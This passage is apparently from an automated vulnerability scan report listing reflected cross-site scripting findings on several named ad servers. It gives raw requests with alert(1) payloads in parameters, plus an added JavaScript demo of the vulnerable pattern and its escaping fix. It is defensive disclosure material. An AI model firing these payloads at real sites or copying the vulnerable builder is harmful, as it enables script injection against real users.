GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0&tp=760aad'-alert(1)-'e72e3365ae1&forced_click=;ord=20110320171328? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.robtex.com/ext/ads/buchscr User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:17:42 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:17:42 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6130
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ick%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0&tp=760aad'-alert(1)-'e72e3365ae1&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign%3Den\"> ...[SNIP]...
The value of the tp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2dd35"-alert(1)-"77d42671dca was submitted in the tp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0&tp=72dd35"-alert(1)-"77d42671dca&forced_click=;ord=20110320171328? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.robtex.com/ext/ads/buchscr User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:17:38 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:17:38 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6130
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ick%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0&tp=72dd35"-alert(1)-"77d42671dca&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign%3Den"); var fscUrl = ...[SNIP]...
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52806'-alert(1)-'1950dbb4dde was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5554.acerno.com/B5224009.7;click=52806'-alert(1)-'1950dbb4dde HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?UbwUAGFwDADJKoIAAAAAAHC4EQAAAAAAAgAEAAYAAAAAAP8AAAABDTF.GAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACg6wEAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACqsvTHEBzPCVCAR.nLIFOdMgiZVYfnKjX27zwEAAAAAA==,,http%3A%2F%2Fadopt.imiclk.com%2Femb%2Fq%3Fsize%3D728x90%26m%3D3%26l%3D1177298%26c%3D150,Z%3D728x90%26s%3D815201%26_salt%3D3980777459%26B%3D10%26r%3D0,79331f34-5316-11e0-a8b1-001b24784a22 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 257 Cache-Control: no-cache Pragma: no-cache Date: Sun, 20 Mar 2011 17:26:31 GMT Expires: Sun, 20 Mar 2011 17:26:31 GMT
4.43. http://ad.technoratimedia.com/st [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.technoratimedia.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b37d"-alert(1)-"45e6ab6a264 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?pfm=1&ttch=ch&tgdg=ch&titn=ch&rtg=ga&brw=cr3&os=wn7&prm=0&efo=0&atf=1&uatRandNo=62870&ad_type=ad&section=1426204&ad_size=728x90&8b37d"-alert(1)-"45e6ab6a264=1 HTTP/1.1 Host: ad.technoratimedia.com Proxy-Connection: keep-alive Referer: http://cache.techie-buzz.com/ads/top_728_filler.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TVER=8; TMEDIA=Coun%3ANA%2FPostal%3ANA%2F; TMEDIACATS2=%5E38%5E%3A%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C19%2F%5E44%5E%3A%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C19; TMEDIAUUID=015310CD%2D0616%2D46BE%2DB1EA143CC96AEC60
Response
HTTP/1.1 200 OK Date: Sun, 20 Mar 2011 17:26:17 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Sun, 20 Mar 2011 17:26:17 GMT Pragma: no-cache Content-Length: 4413 Age: 0 Proxy-Connection: close
/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.technoratimedia.com/imp?8b37d"-alert(1)-"45e6ab6a264=1&Z=728x90&atf=1&brw=cr3&efo=0&os=wn7&pfm=1&prm=0&rtg=ga&s=1426204&tgdg=ch&titn=ch&ttch=ch&uatRandNo=62870&_salt=3992706049";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';i ...[SNIP]...
4.44. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.yieldmanager.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7cf7e"-alert(1)-"a56ead6dc0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=160x600&section=674716&bur=75598&x=http://www.burstnet.com/ads/ad16597a-map.cgi/BCPG175405.254264.267318/VTS=2RFkT._GgX/K=ADS_T150/SZ=120X600A|160X600A/V=2.3S//REDIRURL=&7cf7e"-alert(1)-"a56ead6dc0c=1 HTTP/1.1 Host: ad.yieldmanager.com Proxy-Connection: keep-alive Referer: http://techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=uid=87d2451c-50fd-11e0-8afd-003048d6d22e&_hmacv=1&_salt=327327191&_keyid=k1&_hmac=87cfa58169cdc261fd30bf9c1633447993c7cde2; pv1="b!!!!-!!L7_!*:n8!$0c3!,+ZH!#WUL!!!!$!?5%!(KYu6!wDW,!%JFh!%Oo9!$8eI~~~~~<o,,><s?nHM.jTN!#819~!$gwk!0E=#!%G'u!!!!$!?5%!$Tey-!ZZ<)!!jYm!'Mrt~~~~~~<p%L'~M.jTN!#tBx!+*gd!$6O/!0H/O!%G[Z!!H<'!!?5%'2^c6!wVd.!%QRf!!ayK!'N^l~~~~~<pN(@~~!#LXe!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~~!#LXr!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~M.jTN!#LY.!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~M.jTN!#Lb-!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~!!xa=!#`ac!$5*F!$i@e!0oZP!%GRx!!H<)!?5%!$qXJ3!@Dj0!'NRE~~~~~~~<qc=9<sGhr!!!([!!Rl,!!E)$!$XwU!0pbc!$so$!#a.3!!,)#%5tS5!]7:6!%4=%!%g*F~~~~~~<qd6K<smWP!!!([!!v#F#IxPE!$Wiw!(^yZ!#PIK!!!%%!?5%!$px$-!w1K*!%0]Y!%7E2!$/h8~~~~~<rmNa~~"; 
bh="b!!!%$!!!?I!!!!/<qd67!!%#4!!7(q<o_%.!!)Qf!!!!(<nTlX!!*cu!!!!3<qd68!!*oY!!!!%<pN)4!!-?2!!!!*<pN)4!!-Oo!!!!#<nsgt!!/DA!!!!3<qd67!!/Hd!!!!2<qd67!!/He!!!!2<qd68!!04Z!!!!#<qgdp!!1CD!!!!#<p]be!!1Mv!!!!)<qPUB!!1N=!!!!'<qPUB!!1NO!!!!$<qPUB!!1SP!!!!#<nsm5!!2-O!!!!(<nTlW!!2P@!!!!#<nAv8!!3):!!!!5<qd67!!3)?!!!!5<qd67!!3)C!!!!5<qd68!!4@a!!!!#<q)L?!!4i7!!!!#<qbhM!!4oZ!!!!#<nA,w!!?VS!!<NC<qDX7!!M=.!!!!)<pjWE!!Mev!!!!#<oa?r!!MfS!!!!'<oaA%!!N]q!!!!$<qc5_!!PKh!!!!#<okyj!!PL)!!!!%<okyj!!PL`!!!!'<okyj!!R`u!!!!(<qd68!!Ra#!!!!(<qd68!!Ra)!!!!(<qd68!!UHs!!!!(<pLo`!!Vj^!!!!%<pLoI!!X*c!!!!#<pBKB!!X41!!!!%<pLo[!!Zwb!!!!/<pN)4!![@p!!!!$<qd4F!!bu:!!!!)<pjWE!!itb!!!!6<qd67!!j,.!!<NC<qDX7!!jW8!!!!)<pjWE!!pkJ!!!!6<qd67!!pkL!!!!6<qd68!!qrq!!!!6<qd67!!qrr!!!!6<qd67!!qrv!!!!6<qd68!!qyo!!!!2<qd68!!st`!!!!(<nA,e!!u2f!!!!#<nA,G!!xV'!!!!#<qBrC!!xV=!!!!#<qBs(!!yXN!!!!#<nAwa!!yaE!!!!)<pjWE!!yq>!!!!#<re$l!!yq?!!!!#<pOO/!###L!!!!#<qNtp!##ah!!!!#<pqhD!#(x0!!!!(<pLo[!#*Xa!!!!#<rao$!#*Xb!!!!#<r)hx!#*Xc!!!!#<r)hx!#+x/!!!!#<nQdW!#.dO!!!!)<pjWE!#0fP!!!!$<qd68!#0fR!!!!$<qd67!#0fW!!!!$<qd68!#0mN!!!!#<nAwa!#16I!!<NC<qDX7!#17A!!7(q<o_%.!#2._!!!!$<qPUB!#2.i!!!!#<okyj!#2Ic!!!!(<oaA$!#2Id!!!!%<oaA!!#3[#!!!!$<nQHk!#3pS!!!!#<p,e4!#3pv!!!!#<p,e4!#4ue!!!!#<p3Y1!#5(U!!!!#<pjT1!#5(W!!!!#<piFJ!#5(Y!!!!#<pjTA!#5(^!!!!#<pjT1!#5(a!!!!#<piFJ!#6Ty!!!!#<oDg4!#89b!!!!#<pqh_!#HhJ!!!!#<qX-f!#I=D!!!!$<pd+P!#K?^!!!!'<p_19!#Km+!!!!#<qppS!#L*a!!!!6<qd67!#LI/!!!!#<p]be!#MTC!!!!6<qd68!#MTF!!!!*<q*ty!#MTH!!!!6<qd67!#MTI!!!!6<qd67!#MTJ!!!!6<qd68!#M]c!!!!)<pjWE!#Ms!!!!!#<rao$!#N+W!!!!#<qPUB!#O60!!!!#<nAwa!#O@L!!<NC<qDX7!#O@M!!<NC<qDX7!#OWV!!!!$<ol!U!#OWX!!!!#<ol!J!#O^a!!!!#<nAv8!#P8A!!!!#<nAv8!#Q*T!!!!)<pjWE!#Q+p!!!!)<pjWE!#Q,.!!!!#<pjWF!#QpI!!!!3<qd67!#QpJ!!!!3<qd67!#QpL!!!!3<qd67!#QpS!!!!3<qd67!#QpU!!!!3<qd67!#RU?!!!!6<qd67!#RUA!!!!6<qd67!#Ri/!!!!)<pjWE!#Rij!!!!)<pjWE!#SCj!!!!%<pjWC!#Sq>!!!!#<nrb9!#T-b!!!!6<qd67!#TnE!!!!6<qd67!#Twl!!!!#<nZs,!#Tws!!!!#<nZjk!#U@t!!!!1<qd67!#U@x!!!!1<qd67!#UA$!!!!1<qd68!#UDQ!!!!*<q*ty!#VDX!!!!#<q4hD!#VRb!!!!#
<nAv7!#XI9!!!!#<q)LA!#YOT!!!!$<qOId!#YQK!!!!#<oDg)!#YQL!!!!#<pjT*!#]#G!!!!#<pqev!#]Ub!!!!4<qd68!#]Uc!!!!4<qd68!#]Ud!!!!4<qd67!#]Ue!!!!4<qd67!#]Uf!!!!4<qd67!#]Ug!!!!4<qd68!#]Uh!!!!4<qd68!#]Ui!!!!4<qd67!#]Uj!!!!4<qd68!#]Uk!!!!4<qd67!#]Ul!!!!4<qd67!#]Um!!!!4<qd67!#]Un!!!!4<qd67!#]Uo!!!!4<qd67!#]Up!!!!4<qd68!#]Us!!!!4<qd68!#]Uy!!!!4<qd68!#]Z!!!!!.<pN)4!#]Z$!!!!*<pN)4!#]w8!!!!'<q*ty!#]w<!!!!'<q*ty!#]wX!!!!%<pv/h!#]w[!!!!'<q*ty!#]wf!!!!'<q*ty!#]wp!!!!'<q*ty!#^c@!!!!*<q*ty!#^cm!!!!*<q*ty!#^f#!!!!2<qd67!#a3k!!!!)<pjWE!#a=#!!!!#<o`%d!#aG>!!!!)<pjWE!#aH+!!!!#<r)hx!#aK:!!!!#<p%Ky!#b<Z!!!!#<piFJ!#b<_!!!!#<pjTD!#b<`!!!!#<pjT1!#b<a!!!!#<pjT1!#b<j!!!!#<pjT1!#b<k!!!!#<piFJ!#b<m!!!!#<nrVk!#b='!!!!#<pjT1!#b=(!!!!#<piFJ!#b=*!!!!#<piFJ!#b=E!!!!#<piFJ!#b=F!!!!#<pjT1!#b=J!!!!#<nrVk!#be'!!!!#<nAv>!#e(n!!!!#<qNNv!#eQ0!!!!#<qbhM!#eQ3!!!!#<qbhM!#e_K!!!!%<q*ty!#ev4!!!!#<rgM%!#f__!!!!#<pd^@!#g)H!!!!*<q*ty!#g)I!!!!*<q*ty!#g)L!!!!$<p%L'!#g)M!!!!#<o,,D!#g)N!!!!$<pN'h!#g)O!!!!*<q*ty!#g)P!!!!*<q*ty!#g)Q!!!!*<q*ty!#g)R!!!!*<q*ty!#g)S!!!!*<q*ty!#g)T!!!!*<q*ty!#g)U!!!!*<q*ty!#g)V!!!!*<q*ty!#g)W!!!!*<q*ty!#g)X!!!!*<q*ty!#g)Y!!!!*<q*ty!#g)Z!!!!*<q*ty!#g)[!!!!*<q*ty!#g)]!!!!*<q*ty!#g)^!!!!*<q*ty!#g]5!!!!'<qUl5!#g_f!!!!#<o,,D!#gaO!!!!$<p%L'!#gaP!!!!*<q*ty!#gb5!!!!4<qd67!#h.N!!!!#<oDg4!#j9h!!!!#<n9!g!#l#]!!!!#<pd+P!#nEj!!!!4<qd67!#n`.!!!!#<qX-f!#n`5!!!!#<rmV9!#p]R!!!!#<p2A7!#p]T!!!!#<p2A7!#q+A!!!!4<qd67!#qF%!!!!*<q*ty!#qF'!!!!*<q*ty!#qUW!!!!4<qd67!#quh!!!!#<rmV:!#r:6!!!!#<p]dk!#r=i!!!!#<nZs2!#rVT!!!!4<qd67!#sXy!!!!%<qNu<!#so_!!!!#<p]be!#t:@!!!!'<qPUB!#tM)!!!!)<q*ty!#thg!!!!#<pjT1!#uJH!!!!#<pd^1!#uJJ!!!!#<pd^1!#usu!!!!)<pjWE!#v9_!!!!#<nB!e!#w!@!!!!4<qd67!#w!A!!!!4<qd67!#w!B!!!!4<qd67!#w!C!!!!4<qd67!#w!D!!!!4<qd67!#w!F!!!!4<qd68!#w!G!!!!4<qd67!#w!I!!!!4<qd67!#wW9!!!!)<pjWE!#wkr!!!!#<p2A7!#wnK!!!!)<pjWE!#wnM!!!!)<pjWE!#x>u!!!!#<r:uS!#xI*!!!!)<pjWE!#xUM!!!!.<qd67!$#2]!!!!#<r:uS"; 
ih="b!!!!R!%?RR!!!!'<rmNX!%?Rl!!!!%<rmNX!%?m7!!!!#<p]i+!'4A7!!!!%<rmNV!'4A9!!!!%<rmNV!(4uP!!!!#<p^*H!(^yZ!!!!#<rmNa!)AU7!!!!#<pN(R!*rnf!!!!#<pv/a!+%qt!!!!#<roWO!,+ZH!!!!#<o,,>!,?Kj!!!!$<pN)1!,A*-!!!!$<pj[S!,Dln!!!!#<pqk'!->hZ!!!!#<pv0=!-fc'!!!!#<pd]p!.$Cj!!!!#<qc=8!.$Cr!!!!#<qc=7!.L'V!!!!#<rasm!.SpC!!!!#<rat%!.`'5!!!!$<qd6G!.`.T!!!!#<rAKN!.`.U!!!!#<o'YF!0(6l!!!!#<p]b^!0.2@!!!!#<pqfN!0E=#!!!!#<p%L'!0H/O!!!!$<pN(@!0QKi!!!!#<p]Te!0QKk!!!!$<pk#S!0QLr!!!!#<pN(S!0S3y!!!!#<qd4F!0cn'!!!!#<q*ty!0cn,!!!!#<p]aI!0con!!!!%<pv08!0coo!!!!#<p]rg!0eUu!!!!#<qn]D!0oZP!!!!#<qc=9!0pbc!!!!$<qd6K!0vr,!!!!$<raoq!1%3H!!!!#<qc=7!1(-6!!!!#<rmN+!1/X3!!!!(<rmb3!1/X6!!!!)<rmb2!1/]r!!!!(<rmb3!104d!!!!#<qn]E!1:dV!!!!#<rmMp"; vuday1=[cdPJI7PHzX9H4W4d=[p1[Y'G!3w>8BIdqh; BX=6l13v316lnh2l&b=4&s=8i&t=47; liday1=8eD/sfr=wM!!o(>l-VP:9.<FK!3w>8iPO%U
Response
HTTP/1.1 200 OK Date: Sun, 20 Mar 2011 17:25:56 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Sun, 20 Mar 2011 17:25:56 GMT Pragma: no-cache Content-Length: 5211 Age: 0 Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.yieldmanager.com/imp?7cf7e"-alert(1)-"a56ead6dc0c=1&Z=160x600&bur=75598&s=674716&x=http%3a%2f%2fwww.burstnet.com%2fads%2fad16597a%2dmap.cgi%2fBCPG175405.254264.267318%2fVTS%3d2RFkT.%5fGgX%2fK%3dADS%5fT150%2fSZ%3d120X600A%7c160X600A%2fV%3d2.3S%2f%2fRE ...[SNIP]...
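The adj findings above (sz, tp and click copied into document.write('...') strings) and 4.43/4.44 (every query parameter, name and value, concatenated into rm_url = "http://.../imp?...") share one root cause: request input lands inside a JavaScript string literal with no escaping for that context. The following is an added example, not code from the Burp report or from any of the ad servers it lists. It models the vulnerable builder, runs the 4.43 probe through it with alert() stubbed so the breakout is observable, and then runs the same request through a hardened builder. The host name ad.example.invalid and the parameter set are constructed for the demo.

```javascript
// Added example, not code from the Burp report or from any ad server it lists.
// Host name and parameter set are constructed for the demo.

// Vulnerable builder: raw concatenation into a double-quoted JS string literal,
// the pattern visible in the ad.technoratimedia.com and ad.yieldmanager.com
// responses (rm_url = "http://.../imp?<params>").
function buildAdScriptVulnerable(params) {
  const qs = Object.entries(params).map(([k, v]) => `${k}=${v}`).join('&');
  return `var rm_url = "http://ad.example.invalid/imp?${qs}";`;
}

// JS string-literal serializer for the <script> context. JSON.stringify escapes
// quotes and backslashes; the extra replacements stop "</script>" from closing
// an inline script block and neutralise U+2028/U+2029, which older engines treat
// as line terminators inside a literal.
function jsStringLiteral(s) {
  return JSON.stringify(s)
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened builder: one encoder per nested context. encodeURIComponent() for
// the URL (applied to names as well as values, because the reflected input in
// 4.43/4.44 was a parameter *name*), then jsStringLiteral() for the script.
function buildAdScriptSafe(params) {
  const qs = Object.entries(params)
    .map(([k, v]) => `${encodeURIComponent(k)}=${encodeURIComponent(v)}`)
    .join('&');
  return `var rm_url = ${jsStringLiteral(`http://ad.example.invalid/imp?${qs}`)};`;
}

// Executes a generated script with alert() stubbed and reports whether the
// probe escaped the literal. A script that no longer parses is reported too:
// input that breaks the syntax is still input that reached code context.
function runWithAlertProbe(script) {
  const calls = [];
  try {
    const run = new Function('alert', `${script}\nreturn rm_url;`);
    const rmUrl = run((x) => calls.push(x));
    return { alertCalled: calls.length > 0, syntaxError: false, rmUrl };
  } catch (e) {
    if (e instanceof SyntaxError) return { alertCalled: false, syntaxError: true, rmUrl: undefined };
    throw e;
  }
}

// The 4.43 probe, sent as a parameter name exactly as in the report's request.
const PROBE_NAME = '8b37d"-alert(1)-"45e6ab6a264';

function demo() {
  const params = { [PROBE_NAME]: '1', Z: '728x90', s: '1426204' };
  return {
    vulnerable: runWithAlertProbe(buildAdScriptVulnerable(params)),
    safe: runWithAlertProbe(buildAdScriptSafe(params)),
  };
}
```

demo().vulnerable.alertCalled is true: the generated line parses as "http://...8b37d" - alert(1) - "45e6ab6a264=1&..." and rm_url ends up NaN. demo().safe.rmUrl is the intact URL with the quotes encoded as %22. Escaping only for the script context would not be enough on its own, since the value is later used as a URL; and for findings titled "name of an arbitrarily supplied request parameter" the stronger fix is an allowlist of parameter names, so unknown names are never reflected at all.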
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 315ee<script>alert(1)</script>f72375c49d4 was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ads/ads.js?uid=0xIawmmrsYYagWK1_6772529315ee<script>alert(1)</script>f72375c49d4 HTTP/1.1 Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?n3caAJxLCgAxV2cAAAAAAFbVDwAAAAAAAAAQAAoAAAAAABAAAQABDdL2EQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD2TgUAAAAAAAIAAQAAAAAAAAAAAAAA-D8AAAAAAAD4PwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACU5zluMBzPCfyPAYJZwS-weB2tSCNbGpLI1FFnAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad16597a-map.cgi%2FBCPG175405.254264.267318%2FVTS%3D2RFlO.3dTL%2FK%3DADS_T150%2FSZ%3D120X600A%7C160X600A%2FV%3D2.3S%2F%2FREDIRURL%3D,http%3A%2F%2Ftechie-buzz.com%2F%3Fref%3Dlogo,Z%3D160x600%26bur%3D93455%26s%3D674716%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad16597a%252dmap.cgi%252fBCPG175405.254264.267318%252fVTS%253d2RFlO.3dTL%252fK%253dADS%255fT150%252fSZ%253d120X600A%257c160X600A%252fV%253d2.3S%252f%252fREDIRURL%253d%26_salt%3D4137244318%26B%3D10%26u%3Dhttp%253A%252F%252Ftechie-buzz.com%252F%253Fref%253Dlogo%26r%3D0,8bf33f3c-5316-11e0-841b-003048d6d1c8 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=69a5d959-2383-46d3-a91e-54766c81e851
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=A96D224D3326D49C0D5BFDEEC19E8ADD; Path=/ ETag: "0-gzip" Cache-Control: must-revalidate, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" Content-Type: text/javascript;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 20 Mar 2011 17:26:47 GMT Connection: close
The value of the et request parameter is copied into an HTML comment. The payload 948da--><script>alert(1)</script>b81f0b3d616 was submitted in the et parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
